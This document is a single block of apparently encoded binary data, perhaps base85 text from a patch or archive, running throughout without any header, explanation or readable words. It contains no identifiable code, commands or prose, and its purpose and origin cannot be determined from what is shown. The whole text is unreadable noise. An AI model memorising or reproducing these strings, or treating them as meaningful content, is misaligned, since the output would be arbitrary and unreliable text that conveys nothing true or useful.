zp+SaJ&r9YA@8ir2FF-?QBJk6fQ7({xb?T<okypOoUy+l4F}>o>Fk@~zT!YG0+qy|sGNBoYjr?$d1YhRVgB&07tW^*_}A z;6J_!awn5)vrIIMBr@;J1oht_vo!VmttYGuyK3*HpRYxQL?&4v`uPi^lNCQbPSE6| z9*cE}IfT*_LKPf5Lye7OF&OFdJEah&Wxwbpf<+BA?^dv+c>;a%q{VFOzEkK0sBxrJ z$;{Xqf?^FyU62W7=dSgyk2FD8b|%QrDE>XvIR?d`RjA>PA)mVO*G*B7zPEoRfojDG zklzM5VgImG)6$(2nkC)my&99r1@ThNZ&USWv1Drg;9!cu%1wh6<5vWp`@D*CFC^=F zty+`*)HLLF_uay_mf;`$xkZn=_2?(PPcWIcbk69kYJBc7bJI_rps{&GAj>x-584>J~TAyZ3hKNM2khZ{^>agUh^Uvi+O@qHqtH5{_> zDT`(+YGNTXzqs`^rI$4TnS*=tRh-og(Vli?4O90{=S|-G*^eufr1+MYQ8Db7Qw2yn z$r^gku!u{+BcMnd_0wl@_pw(Ig?RFQ=P=3^+Ou~M{!Z&p#V^4FCqC5In@7eV#8o7H z2um@+WQy9u?4^pu;^}1zlw)xLsZ}S3k!{VB#AYsFrCWIx^o$R6U2?qJ2dUPj2XTIi z&5V3vs7^Eck;{t*E>Pe)Dx80~yvMCxji6g;lBU)aG-PXg{~rWb)V6YHN!58mlK-j) z{P-w0#e}J8%~C=&=^d;{#ClZg8`(9Ys*ljsS_nx99P#Ye12`CQb^?a0^N&)Fy?+#lkLZcsGQ zM|=Pmqeq25D{Cc;pYFLN?)cCW5#_E27NArI8Q z(7`>;FV>A=*{-&LoHtoxFSz^_t@1)WqPZi@Wx!g_jglkr)$jm&K@wL7HSQFJ< zQ3YakRaX`N9C68-GRLE4$0kZia+gxMMBOdWsQeTOP+bpbmG6axC@2;kQL^%32D#^! z4lFDrowFh2Pzm-%=PAscC^&qP{eGn8QlyEeoK}huc#B$eWZv|@BJcugJ`A1mp;bXN z{N~jf)4b4Owu&&;zYkLbRubuTB}iusXVE3&EHVwq2AF(~j3iJRdD_A^qEc#%SP^6tB z8z(N0Pk8G4K4*RDZE2c8s{}kJ%!zimkCRIEnz=2-Mx+`lULd_H{*Y|4Ao_VMU1B$V zh%(<*PvYK#B0rWVSDC7Z=bw;7@6Yj`syfxHvTG|}iwgy1uZ~?DGHXv^UU3&xOE5S< zuOIk|mC;0^TBKIPLdMrs`X5B$H4^~JGN7i~kZzS96ZXhw0&vy*CMgSqU7L$Xb%;hS zib#K-_C%rcX`-qL=0OqevrI=e2aNA0+a0Ir)**K_!tm1nJz2NusO?;k8_(hMbs-BX zQr3;{GM}kVYhq4KD?z18JxA*@v?3vXP-9e7twCs;M0`_}n6BlfIJIy!t$&Q461}Se zVOXf{m0hSwk?L0zd0pKg#M^*S!1FlVj?qC zJ+1_@zSY>l@~jCZh#XJwOIiS6APe>xj8pj{L6y&^U8Q|B_u6`R0tMlu6hAMS&v0YR8E^Oo%>)E}z7RV^k&sQMPHuAtw@p$A*)1x7p(3 z;?OpNu0q+}x}fx{w1wS0#|PdCIwvUv9i&~`@UvUEuekB?y7pa^eHdX18Ps;}n*J=8 z=IHSIWE>Gbn%lgoK0BV^L1*XcF|iQ5_`cuR6r!fq$ftR5Gqdxuc3AAH=a4Y8xx7F@ zu=q+tC=4>HWSuHhxR&uTqx7Kw-vk>RPVNvZ1n(X?rq0}nQtWq`a%<&@yl!#^%zBsm z3`Q64jxferJtYDq*(jj07TeOqtnOI?K$62KP}*`;o%bQl54oA-F)Io2?exIry9uG* z>wSht?YLrzvwJc3A02K&V?$Mz*4~Dv4&x;k4Ti2C6^rTtQd*LDzDNR;Wy&1fr{e(S zwF1h2<0~hW0!69g4`aEMIm&ZRLDU`u-#@cg3Nv#9g7L7sZn=%s0m&7>>PZiM$OzM9V25z1}`yAa~IE?!o5f z5u_U=0PXi<;)L^@2RG~1@&2i66CqA(dRJB{6>sfpvB0bw`b-ub$W&Ql3*SG9z1IcR zQc|RNBeE4v_G=n501%%+8M1p@HTR+WX(15PT4`~Yas zjW!8pCjw=Kx9aY-aA5)2=7m;m%(^6*9K`v>b#j}@${RrW)%RQ8#xJd1_RcyqXLv=fc*N9aYJUR8M_xvg9UkGY2!S&7*(ewRqRtH_eW?CzVQeheUApuYJ+d#6@Cl1gNOK$H61YVc zoB0*&JgLwCtUn8mclJG13HZ+o*5o3i;GXbA)9zagGnPaaRrl&eC26GOq+AOd(Db@>{nP)ha~9PZv7)K zW93P~S@N#)zwqnu)J4H9E*ac;D7n#IBr$An6MV_ltX+7>ciK(OGxy7!e6r5lDt*hF z=B(Qsq(dT|%a?g;8CH&9LL-&xoVKN<7l9kcj!RkPj%X3afV0MeV0xyYk91orRjhy0 zMKb!pR^Z~03r$|h)QaLS8#Rilhvox+PAN0CS6>5)MlKm zht6yZ{&8)cXB+j>kt|u;dn+d0JAHgxU8U1=Mty&T->X350AqQ3PYtRHLFs6%iW5*D zo7? z`~kSZo0!EB&iyv?WfZt7k(kqP zF5rV%5KmN!%wjuz#M#QSz^=yGk&4c>^w894p)`PA^1TgE+uw=n6-2yk178MR=vnDE zIJdUp#jMQk;|~ zSXhS4jg??R_Uuy#`t!=N8m^+4{Y$*5sB_gx|6jgrL)w_DHUx|Yo@JmXlil4J0{=w1 zxIAp!B1yq+HYQWplklR!t?1~Euz&d$k#-F#9}>ovy`9elsyc-|Nw;62yDJ4gsZ^H?2AgF*&n`SQmOwD8|9cld-Z6x6y++5JoRCWPdFz+fJ>ZrC2 zH3)^INo6#PTg}Y!ih#^HT@ZeDl-LCmu-;SbgUK>HJ!jENTi>$u>edcTKnLM!>ut0e zUGG`V+_TC1HuYWZ@I*o*B9g5oUD3jOc@~?^w%V`PJpv=4D(Afqos%Uo=g?X!8opg@XYxRtrT1y`d60;^_UTdcXc@9Wdo2m6~DTk=7Fq`Vf%wpf- z^_+|<5dn`i86NGUab1zlI=%19<{GvoOGkT!A(|7`HlDn*q_ozO->@h%#!J~NPvo#= zE);CMDf`hDFuy2Ms!F+=Wyu~TYQNf0GMb{}>n!T61D}(~I2I78&%c}T9@<{xROTcb z0sM|j;JcGPkc&T8v0UlH&2yGD-p0rzl=er37K{$z#Days={$hgc)kN3g);_hc7 z$VZEvMj`h{#`rv;YHA_unY`!K0SlN&$c3Ng^`l69ZzD=(q=EY^>~DJc(Tc9YpUWiO ze+7m|ei7*2c5*sk)XyrI&t;eTzSmr0BzlGVIN`x6IG z9gTdCmrOc>sv{NQgU#WsNjVE*fRzvebX)bcd0Te?iR8Cs&*X~>?jlKI-o=n7ZE}?j zUC+hRTER&wqB#r{9ZHZJJ>lT}s54RAjX_kjNCf zocRodop?uUK{YMRbI#w@6_4GP4|09<#QkdtKFdX9C z(}QDVVsqTdeTW{_ZF3h=yz+b~u)-VBuu z-sIi<`y`UuF$L1xFjQEW39_=Ob){G-@)c`g3^Ya%n3(XIp$>QeuH?4xzlv2rpeRrT znMY$0i#=l8vkgnI`LAZ(s5El`KgbUP2NUgIOeLE(hUgy=19oVj3jo9+M1Htg zRa)AG$7W^2tDFX6^|Q#J+11!F%b9!ny=JS$kK&PEZnfH{_}^8|flM6nC%9Uv<;~p5 zy47FhHY4TM$2gJ1-TGa#7&faL^V;R=i%q4nE%@{QK_sn|Y+Q)6Rry=2GoR{FvM!N5 zO`ahTU2BV&_sp+G@z=Z|O~)w{?A-kzT#h4WjKp9U3nXbd)f;1bTq)iua5rPXp?})Hie-j{aoo(#|qr4U# zo}^BH5pNdxK|osT$4%Z02?&0Yo6<3uyr@b}bxXk{8&?lpV{Oz9X zn9rQ1^S+r$jc!Mh@`$}MmA#i;PSzJ2P$sA(EJd#nr-$Ou-hGqj&2!{4u-*B$qN@?Z zD(>$?0&qKo?x!E(In{p<+@(3%GPv|>NBt=h#}D)H@N)_G5=yQ1mp=XHiP{E9c@@|C zqr)eE>;CbHDy}U1Op2s?xVZ8nK2l0aYHAHL|06Bre}Tg9|Bb8<-POoQ(NQLmBMEUL zDmBAq(BikT%@k41R6IUzmS=6J?#TLdic0&k=8YB#A(;nHTxb^tZS=B35|_!f-}8e+ zape}qoE}~?XDgBSDf?>YEheS}NAHmuS^U$#S8>C(iVuaV zN8*pdSk25kM?6OksJ6STHcz{T`^f4>MsEz-CgwCD8(4~zeCg;3ZvP^zMf8w+6t9PC zxJm^3X6}pZpP3x=?EbS40j5P~KK>Xt^}Lk*Sq+ z90mzPsiud12dVog3gn-2nZPS{Os2cKfZGylLf9@jx;Co%oJwXONM3|n13zY`V_s)t znZ4%Mb=sKco`i@H ze_HnSx##!LVn+shK~+j*x0(|?!N`}sml}+{iVH4N)YX{hdOjW=qZ0&>K<}J`eqd=* zy!sV%6zu24Pm9+J{z-S{g(CFmNJ3b+}gtul4FY}eF3H|pm7CTA8>>pG;L0# zx;Owg7tw>ZJDTcOxoE=&`r=`24SCcKSgi144IDTY8sDy)nbg(y%{`djzeuR~F!*@+ z7{drDrnZ=IW(ady_yjN4o#Z{fc_@FEvs8E2S3(H2;w^BOHLQVb)AVp7Gxm1DGdgA4 z4(i4w$XgDxZNi%i2F??yO(?Ub#(tgW-XpK z$RZyBn6%3<8i);rM5-Q*SJ!|_S?7(s@_xPd{mC+bDou-(wq9enTrzm?NpfY>B)sYH z9yDay{XI{dD%X#vUN8n%n=V==K*wHFy>8{+a`I2*t*bnlFv#&Q$*u3{m3G~!K_gv@ zd0S1P&cN9*>O3}!a;T)Y^QMvuKwK3zxETQ{e={99@X3gf&*eG8ngC@|PQK1FaI85? zZJ~$tln_(D)J&?p={ z+-Qq_0o1kuQe~FX7eM)py;809LfE+c{5^`EPZ~_0CMgzSPf~mu*fyo@40_nR-y1r98!HHWZs)&q{G*kAxWW`z!y@;`TI2Au137O;}q? zbT4wwSv8rR2ykXxeiIw+}619G|3^4T0x>(KVjJQjh(x< zK4&qCsPB?B#x-&cVt7LLZBK2kukD(1N4Izl7+%?H1&rxy_bE)U;`k3@71N6M&*?f1 z%J!d&sh`w#8_MxNehvdUpMxkKWtFkZHmR?(kVX5R9eE>2WLdA(2jh0Qn{i^3&y_jP zrOzfBTnwAxT}9!wK*zcw$#cCNml|)Fxg;Yh+AxH4*5ucj-fFrG%lq-%mC8pNUa+6Cd8VrC1#)$Bh$t9r;SrobvaMe zAAR!+Q%CSvZ;A$F`g(ljEkvv|F~G+#lpd_e2HSu%y9_(zRa0F&n7lt7J@C#Gt!F zcHQx*nBIr1r|Cd=Aa|bi@(=dW)k}1!YPb7!LzbG>tWu3<*s))XkS$dv^iMgXM5p4j zTI~04hS0a{>)E-~4lV-xUeAh#zky#_Vn+SjkOhz7;#fM41rH%%&B#bXH@QWI+Omk# zjmh3(p48l_U$WMlmcT<*Q{Ua3nK>Oj?R^+)K>HUn>c_?@f}2+L_W|dw`ffRhiv?(MJSP3jHoss%DVgL^VG(39L*Hv&D&r{ok^ zg>qNtlBOA$bEH!MCb?JWH(zDNJ7Y{>f(>;%C=(mtEg+6UnS~%iL|l_%2EVF>v* zpp61ShQR+H#Dz*7V}oN9Fca4_r?^06(^ebbznRMts%ZC6tv#Hbv6#TrH>0A#1`5dm zY5Ff0FlX^zLuF%Xl&?wSQ97HDFA-o7{%MdZ<3yM{|DJV4*55FecT1mPCM2e)!TV-2 zd(9N?9x~_AA_ZU*>uDD{IhrN@Qzto&&803y(~@o=7D9XpCmVP1WyF7-qpOonAe}8B z4?@mQg1g6%$6>^);LW1HPKYvK6Y&;wf6VU6%j(B8U8E2o1Iya>Icl zBhKuWwTKbRvuk=GPli>1X(N>htM=3EZBaz{VEO+f{FX%pgL|CMD$b`5Q0_Kj7D zEy1@T`BLvHLWh&UdN_)Y^a@(xyrgy0Le8rhQbQ?=W%>n1-#t_W+ORW)de6Ht_;6@k z<;f!XfXEN3Mtifesu#oGh;Uln)brpYUKAq7(#a9aVO@}A=ZkfJHo#`P?yDg*t)fC2 zbZZ>;E!R$G#u^Bh2{&g=$mjK4GycM3wgOm1NAJl)r@(y%TO!_h-+`@R=Hf@WqVdhRDF8E}?+y=Mh;`(_51ThN>o@jM zv^S)c68(I=mWSF)1|+u(AcR|n<~V1XoyPWDa_A zYTe-}0|J36qEs+$O7R^}Ao#4|8KGGlDpQ>IZxhvw*#=Fw?`gh@P5Ga->KvXpPi=rI zN$rZG=nGKKTcVALm< z%Q4!Woq0yHA$QC;D3hq>)Fsh1ct=H)S|-DXD#}dKA}d`<@Y&_yltaB)eo#;T6U-E@ z(F!AQOE-QS3^!}teU82kYtu-xrZrJ+I zW=iOg;@f40)9NIDGQn^Pv+P^PuOy$+nKx6duEjCezUTR+z;M7~!3-k%iqmyP^!SzT zllT!w%Nk^JbgLM57p5R%rHhQm|tJOk$mX-S1{8TmC@sRoNy* z2HfPS2mlX}oW3tpZkiLD5sg z?>{Q_iHOK9i@1*?UUfqRovyJP+v%iC9qoT-5iI#ru$kylG~93YPXf85ofv9h0YU+` z-Jq~}{P@SSWMjrtiEL_I&rJFl=vUfcZ43Eo`oe?d#x$~;^h+GKfGJnl zsb5$puX1nL&#ZX$PRpjU1_7zxGX8@ATY>bXeIA|t{Hzg`OpS^3F65NaI0|=Hrs`0K zFF>k#FuxRqK4qDF*%~I*4iGzJ-iq20Q<>smWBJa4va)uqHGit@?ZA2zf!Qmkh5Kdk$Zz)u^g)Rl+72Kkrk9b6#oMP)J z4OA5()*_KK;TLWbjB5!KtTUGpDhz|G7oHQsXkGV(%RNUxi8k%jfJb9DnWErmp10Ee z7NxJrM@}MKt3$6aM{v$Uzty$H417oHlE+ie&fN3V=TkTyS0Zf|(jAe{KBstZq9@-z zI=!DnsuDDeVm&~|P2sPtPa|xTPeNj_tOimq4x) z57*qA;1lOR^wKSz+AlX@^J>(&C9u>XRLA@n?y9Ft6JA|tO1>B@hFQoNKuN9W+do-@ zS#gZ?{|@oTg(;c+5O0-E@b5J@)FLCzGP;-AVK8wGTh@>}B+@C|tlVa)>(5b2nY>l3 z2L~kOXp43e*KkC|44zQNE3VpaW&=&1Brac*@ihRTzl4Lc{1JzK>tESxCRvZr$iKyw z1bjm$DN`LOOBv8pJEzF5krgZJ^tfn3l7uuRxMRmOf(0r!o7Z4Ik7Ng$Yk^#_T-k$Nq}0Od-iV#7F6EZCEdJwai1aHd*EU6JCSHhA*oTP zn?%~zoA0MEAvcLHM^U_T_PfA=ox|3O3&yPVVcUqHb=`@;6_Q`*g=jT;Xk8~u#sd)} zZa?f;^*ZTTC6_I#4LcTsMJQ*K`TaQ2Cc8w!7Kco@*45suFIxM8LNGHpe9mUQOoole z->Ejxx1LmsG{vSwEDTJq`nLujfW>w-<}=+1=Zbe7AA;}E$^gSybL9c7h@~! z`?D;gR(gd9N~GzdC-vu;jfhV+Y=uPI9JGU);>+8ah>wz&*lA>x2C+ykL{#13O!-~S z>2{gs{>6X9BsT;E>-zS_#^r9pq7o$-5fL`b+e9_hG3vH;7uXG^-xwgaa^8J<8UoW; zSbZe3l<<0zckkh6k*}plX-=y)zNSo&&h4~bhoTAEr(NsQETDoSGYBio^Lh3uD~uyf zA@mpK`M30&>jD1CVUL10afhh>?U``tC(b5Ms9FsVLaF$L+rEw~33S__G!K|9?@W>i z@5XoWbE0usEI}>FEX1+b!nLe9dZ-8Tq~fIa0<4w^(Op`#IDSK(WRC?Q+JAhLZZjg! zVZMyJhwCbZzRRTsE}CA@II?zTCO=d~^hZ7w#~qH3w+jauTxl-)q>})w#X`R2Q0>|l zJ`}v)noOM^Lx{!^|K>Is0+HBlH#gQfumSp-&#WYZW~g(`P31P9`I&3$x`Q$c7nPGv=uyb2+C; zn8FD3#UWBs=f7Tb=&?3iAp=i_TXf4+P@y44myTci;Tj8V9I;%FH~d7&OCv=^H@uU^ zIrO^_0g_FV|3UPdBlvpc^9IcM?oo?i`8W~8A@ibyWIis3N>f@1N?^QRGruzXb#p@; znCalH3FN2gKMCJHm7?6RRoZdjvNp#Ugxr_&Ph?yM2)uK-i*Z&P^*eA~)50G;XkO!> z&e>j$;4$RZWJ%1Y48KgAqcp4(jJpr?{0DKu?T^G??QQ4o;*Kos;@r1Q(!$^F^XLZT zhvZBy==V_85R!UW<^cd-so+=j9X~#dU$bZr{Y(`LZQ4}lQTaA4J-WoNY3iJswKfv; zptDqh?dIWK+I-fs9l&gmAY7M(NTdsr$@}_iJm!m+F)SbN`hHwU_u6xP%IqCqkv9cD zNF~aBp&^l~ zn_3`|za!UQ**Y|%(lDO>sT&ey$7{tXMkt#XS#~KOaUJgDY0@Xoz?jSl3kb%M7AHA= z-whcYBM%>0hP@G{z&-kq{*yR7J(13{X;m}t<4>I2`o|ECnEPqPuJK*vPJJo*v&xp4 z=DtgU;ygvIAWpndoKO`<_R{`#i%S;}qUQ^Y`?(M!!-GLK?C9GdSlm^G+wp837 zL%Wa)KEFW8)!D>Xcg|~|Qqf}9GO2v36r>60eRCd>*lwV~xmveMWnx99srY+`I>vSk zRn@W$wOr9--<2|)<(qYJ>3n1BDZhjFf;z6!T2p;_Ow*}O1L;=Gh>vsC)r*NdC+XxG z7&;Ssn3;$o!~8~7%r!C9_5=GVA${@^mX(3t<;mA8<_(A3xiIR>ABPhG1kWWCl+;q) zMQrt4)P+!0dgSVFf(-rX^Z#-6mSJ%;LE9+K;uf66-JJxtMHUF|4k1YJ;I;&JNzf47 z-QAraVR3hN32x8Xyx)6$=UnGk@9fUb)Kqs@*Hl;C_v#BQA#t0e0#j3`%349{gvDak z-{AWLo%*rdEc-GCz^>ajT&&*tXbB5lE;}oJeIrT6Ni2R!Q%EQi-pS)rs>Pq?dDoND z($B@!5A0vw4Vym5J96afmxbq|86j^pqA}3Z1>fFT(3C8EgCnZMujyvP{Y-EX7F~%f6;#Mzf7PMwN)zi|m{OoC${$CUD_k1{@hi#V=UuYi!_YNvO{jUlOAB}AzrYCIH#3SOdwD#) z*PlrgIALU!{Bzx)e=IOt>v#D)?MgVJxo!**^yhnn=zG&Us|vvzgnvY_}GjUS{i5V+9ZTgYqNzHPe{ERrn*{R&6<)O``W-#%aB;t z+0(SnTw?S_E_0y&@WQ5sl9f(Jlc7g63?b-3DnHK`xMd^N_4Pc)3>Ver)X#1a4FZQHGp({^ij0S;X5O- zxVI8cX7z05!rbgHPcHsXm^1JTJCaXDgMYSJ(y<|8Z$9+-A%Aflii<}Ws9mC^-oj& zWc!$dWa2)GdhOioxW_g9xI^ZeBDpM#)cAgJ@6ABfh?cbPQH#A^jb)h)5{TjML26mh zEYn+crL`)IkZEm5c)3#wr(*jf?k`1Nn7x=LaYtqV$m5~YcrWU}_tqU;;A!r+vI?#Q z2&J%pkVXYqt++)Rw7m?4?eA^Ds-ZJ!?Qu_`Rgd#U3SYg8mA%~-k3`1aTmyLH3YoCRIaF*==~eW~1pT-4utxew9WMmsMluXnQYz-QwA?Hzm|MZgK=CbJI4oYe}1zEsg18m@o@{i1-{ zF|_sUz{Qf1W_+Sh>=+4zU?+4jzs&V3cz-)T;hLFGboltgiHpO9DE_^KLMV&^F`9aA zqBnwdj`P~5ZuXTFCy^q#OUxs}5>toCXWgXDZr+E|b)AFr54Xw*)eyYz)4{GM{$w8lL$E(?_QZw~Q@HE8{N{VEJ)F%E_mog=&2a`cDn5b9XUM{6nd^8)Wvw2IrYN2uRm zNTWz{WV|jfd#CrP^q;P_n>1XkWN^hyJ}z2J;DMjy!92yVfb^b?bNlyyAltS|x8ZbN zGX@G)NeodzuP+xP2}Ued&s#s6X~0_i$|eGIR8 zhR9^Un0S)Jw4*0>SN8G}5e?4#_Ee^e8nx47+dntXeJ&Xz5ox|{Z?V!Li*;esnj@YQ z87hP0WY+n=;+#-cl&mV2|HZuty@6mH`2Pu&XhqWQnNPMZcRnLmW-A-S?U z!{YNJdOH(nTJE3-xkIZb&^NfkA6Zbrar>%v*{Wo1ha48AdefA0z=sQT6l7x+x;1B8 zVr5cXC!s%%awOzu%*%dZn&&RCsA}A-W<5VzfChf>DV-XO~ ztH8jguV$Gi>EkBH>>;(hYxs>MadXRxTXBxLZt8@PfSV{X1ZRck&&_6`-1jrY^;II!#&J(p@ZPo1(=voNb&y3G8``d>EsIY6~ zCZXg}AofaRfb6B6`XjbcdV$P96?CZUtW8~NBlPr;>p#O#N0~{heN^eivufd&!KZ`l z+2>xoO};vHnH2(&Z2ctckrwgWMrmKk2#Mb!RMM2*lhFR#$kk{yq-BrH?#*8U>=5-| z5gpej?GmHm(9UTrf2BLKPKSsq!xO7L7h}>>`l7U0$Rm@*ganO~8;c1)x6+rcAzNRhFx0OdRzPVv~af6Ms z=>B#oJ17xOfiX<(FB&=0*MsUXe2>6`Lo>{}v1RpJ7U}T-$hz9)mCY{R8NnU+7OK*` z*09k|b%IoknqWvQIM&z#z*h7r&|-;0n385NE;#03_0=I}$d*T4O7bUIoh54Lb;tiL zi+wlE)Blmqi_8UOlcbOLp>(E|jQ-VHC;Ln4p|I_9R>^ZdCJZ{jc@wx>L5XXRj92cs zP34uA7Z+yQCs+t6<3_}{ChWiyUxbradXDhl9BgxPoIHDyq@4)#I{G@`Fd!Z9V>+}1 zD|q&a(V9RN%G?W({01;ySX{Rh6edHLti@2=5ZHqnH5Bc6v~_o}JB zVv?kX2R>|eE5sIF(I(1cGgYD6|GASJ8Hu(d>cXYb{%MTO)kdRFd$8Lc9uNyi)UL{maD~{L=72+#obOsrQAK0mal&Hm2FN4NdYr{PP zHVR%HH&C5w{R!C9?&-O3(pMMvez`%Vk!Zhtk=+#7$i`EkW0N_Q@$8XMeisL!Smd@| zd=OVddd5@cS`;=A6#(+sQA089*hI3v z-PL0ZGU3g~L|#E2Wxq`f@@up)o-iz-LmI%J5}yH`E=9qA^7XbpeZnJchH9)_a#EVGoHrwlqvK2m?9xrl9Gh#n54 z6?J*t4Z$kFVe?gQ&z)%A#}`aFTH*p>zYR-C%-qa9{rS;BYhAW?^nGwkxGfede&r_F z(>`5oW?E^9=Oll$dhXzGksn`6ZVqIL+LzP#3-W$>`H&1AptLaoOC-t>GOs!~>e)7x zdq3jd^-2ehH6{-mLgh%;pfY1d2+Y0?*P>@p$ow5}>Sw7eLH#uG$MCsxN+OWQwy$aa zsEBZ9PaM+oC|bjBSEPmll{Ug#C8xfc`6bdgsykD8FZ>HTZln6cYZc;4g3M5cUJLIR zJx{iI-e4zpGx9H@C9|R$vD)OaaI_loPRI(#cSwSNkDCv;j3GxoeV%(R5flyZYfL75 z--?QtwH2DBMV!l2#HjKW4oONi9ajoYom992 zsB^S{lLZQiVI-yMuE_=oQt&sDV~b_ji}yj|)>Su|zhZW_MNupYE01tW7;kvaKPuSI zFGuG8ytaXjC>XH=sz{tRtcGJ%hGQwkRP6dq1G)V~U(OVuMTAR-2@FB_K3Y6oP?8u% zAQ^&--<1%fuudB4{77pRH-r+b_^#)vXc@Ncje!s*T;C!&EMnlt5-D{t8WZT`;=gUT zGIX$R91%tSK~545UJ}Bg9ie zz72_pB|1&GxQN-1gey2N{18Tat~z-@%`BmOQ; zx0+wTv-%Hi&h_>hJ*HMuKxaM~KrLF99lS5X4f$KKcd{#m&ppT;1i<0mSlJih@#mlh zLU?Hv4^@XPB3HXFkEQyKGr?~VVnVrS7yIcIhE6SKmAVc`1r5wSByfdxsTtBJ1Q}4Y6qf1CFm zbddjr$cbwRmVfyVu8Ntfj`^Mr&dK&KC&vO1TS4%iP(oU>X-%Q7#&!FG`5)Mv>1%%9 z7iqdBrpjI2PPP|}zm}8~sc^0p+MG+>M9k@&xqGIsgV|=YBxN3kyi{fYLAu|2lx}Nl z&J-0MhLY_!Pn*i>H)gf?|G~uvl)h)0E#mmv-AVknY3W*ALtt=LJufS8<4!ocTI-d` zZO9Ws2F^$+dHpC%-u&=l`AqtkqYQyp2=E_VV|O6kjWvBA@ISa%!SOJ?SN+*weYk=i zdwE(f%~;!-H;K_W0(^;~U!&!~Zhg=4*M%UQs`GB$Ce~zaL)}MB3#YgDHX^SU9loWY zNI;T>4+Fg3xt)hZN;Hx_jEz_s@YZUVdgvyK;!}dNmuEDbeYFWl{zO{PJJyFNe7uD@}I zP5G-uA1eF@N7%;IHZgfMd@Q|~ElbAEn8Vr`1hiY?8Y6bHe7MfyJ=D8dJibJ$?H!E8 z@B$`=9^yxyVcQ$`< znbH&_pvWk=`tOdr0K89JAiQ?YC6T_(ySH6J39>Le=)_YTS`HEZ&xxvIFAj?Bx1Y8+ z@K!08@}~V*w%#jnb45XyucUgXdY2VRg+HJ)`Oh1EhPwC1f)dU@pSY&*{C-x|TV=23 zaQf*LI#puPIlKQ|y&gV{48vQn9iLd34R80!+>?Uyl5@)X1=*kqQOr>(eZDF#k3L&h z(L?er%vNw{4SOmiIJ1nvLfE*?mgp`LS@wVRy_S1@b=E@AT*wG`!A#9TgbFxJz^XFG zHK?v-?#28>4Ea}Lnw7g^Kmlew-?fDpT0rEdk_rRVvmp_+ zjNp(xucuDTR}TC;qK+oT^b`z**&-SuSwp8_%jPH=DkK*kXr;J0GDcZ-HIWF)+C_7Ga%d1 z2I_(?j#GFaqn<7))aTsLxrU@}M`7udW9&%O*z_zk0=J$5!q&DoCGWrVse|xqmskjG zNPk^yf5>!wq{9SJaQ$c}IKKuq6qcnB{X@?0@4{v#wev!^|xxTN~^R&r8=bUMV)Xk`ic$ z9e>83U%K9AWIZPy*{NHAcFaH7rbeR@r+Ht0Rg7=-D(o9-`Z?SCkKR+)3I_e_(z}IwF*mzviwV)M2UCCT-XAKfJwY;X zk96mse++GLM*6;Ry5UuL?rk4mAZy;c9cTwlj719!`qv$L0yS)XROZp_b#Y!58|=vl z!Xq$hl@_65cL3`=HkKqUm=Oow)#!S7FmDXQ1;R_3{TnnEhBZ~kf??9gSO39ztQ;IZ zH9kJSl~50Vu9}e8xLq(k6ZRuFh=qY;Y8-pmuIO+T99G!@7o1uKhDMt;=Aw{tt}Rw> zKG*y6R{bKpa27Cj5I2YVBUjfZ)E)ctKR#@@vyHFFfbM)3;@66)C~vZV3YMP;|4FyL zsmgSCcW--^^|Cqa`Eg@!qw!`%*3`*qxd#?}yr8DFp|Ygf{>o0l{cP{DHhHm4lW<5L zaXPtr3)7GJy4q-54}Q7t7=E_YxrvDGkME+j=@4jRPq61wA(fX8!~DqGC-NSeMBsOm zz^`TRc-iLPT_G6l2TZ7!L-D)Fz2d4`eaIPNKA3&@>081>x6Gd0{c@JmBJsdy*?O~e ztVc$c+N{HWG}O|VS}oN2=At9`(tG~iDg&Bj@;V*n;FC53w{@j+bL8gBf3_JtK5=1* zoL5fiitLo*wRZRTBwiW7w2fuq$gNQo*Ln!X@%azV59Z@mwOu?s$r4w-w>!0d;cq>m zR+3q!mc^^ny}SGIIKkQ_=2JQ2C6eRLL!YEI_nrRx$l9325wt{!9~ zH}>=g;&B(c%wvl$T4sT=vb8f#3NC#nG<^eiPi&QtsfNhWuBOm}*#m6%!Xv$G8*oihccRP>UX+=tv4!ae-K3@3-oO4Y9>$9&Kbj$|Q`Dii!Jce!p{DCfn{Cl~&u_ zdyRt^8Pwl&J^st60ZMWs^(+QxzR+c&&9-+;s+kzhIm@`F4ha2Rm6tTczt(o{1*11Q zq{$b5ovRMdO?PKD#9>0lzE6Ra7;I4I9h%Gg$qb(fRtk}LLL&4gWo;zj{MON#^ApY; z|3XPND#3QbMuDiGWR$xYQ;1~)aUN^};>%6{>F)m3ec=f^Qvx(&L>j+&L%I4iZrY6X z4c+;}M&zUAymWb64U#h*&69x{uNMbDq6WLd#j{K6TP+~CDd0qT)7H?$S^aLbtUSlC zEA^n7>FvkNsJ^dHL9w;3&3dVPbCKp3sYK98(;4{CwrF;U@{KbrKlmO|$CIHY z#Vbh9-VnnF0@KnzgZBz61abe7f%y#Nozs)Eq(S(Sh^`_ievur$CQ|_~H`1R(%if0Z z1my0jj!y=d`M!!NW3G5H`Ulbq(ruzg0{`A5vyv`1HVMtRBEfO!joY6=r|zJQjCH(? zXh-Hq#SLubnNd>VGD57;ezPQ~aauNT)!yh1~0?P#x3HC0p?dLk7Wzct#Q+TMn% z1J}*Tw|D|q#*QnllDu2T(P~gQK|Co&}i)-u15W0-q1UHfG zxgwJ2E@i?TM5`}xbh^o}z?N~+Ut}rm?FlMpJ=17+dcp<-33>tKeVbMWOHxIuhRFQk zF2+h|?(;AVB>ul@SdOw{XTA6M%j`iihGsbk3^Y|HC00I{?x^$!PE3LJ{ZZ$--0_oRqBjcO4j$=;|kxs~Hh z8~e43tL>-w%FQlxMHEhZ$*J>yMXK_O9l5OjkdwD{7rk%p>OOeye` zNkZf?l4b5|`d#9m*)>7z5Ez>e*GC^AL`{nfWm1?*98G@RIHEM#mOAybz>Z|&j+W$p zl$kN2%KaLD4j8eCy@d=(8ClW>!yBW2uHtorqL$N{*CtKfYN4qkWD6Ji3m%>UUw$UD zJzS^6y1#C{gw{2s<%&Z=e@)lJ9n4X zb7MIG^#RLRm-^vHOvKcLN#xp|`n|WGsIkY3z;Cp*$mJv4pym@6Gvwb` z;*t=$+3GFR{IS#_+NTBO7Gdx^Kkb)ljgBA3Ldx`>SEv3OXtk0xup(u0i5=?~dpfz| z-oa*dQOEp)ne+5t@dQ}|T5EjEK8gOP-fimVcCZE&s0+μ z$3)+P*5%t~Aw7wVCSh}^OYN6m-;^)9DXNwTkBA=iL|>9v-x0YIyea<&_dEH?wS$3_ zkRfsB4Ks=?TQ|!u7q#k3FiXfR*i-g{w_tKv{lbsIfuWl7Rq+imucS3t-yrXQ?b5cY z@om2S{2yHVMdk$N->MM8CwP@^+x@qT#|of{)Ehh8Equpw0KYiDb*TX{Z;^4>(c;I^ z*&*71+&-mW6Zg}6EJcRXm(1L2Z`s=2eF4G6dd57G`;?wbD>ntP>B4N6e_gytpY28t 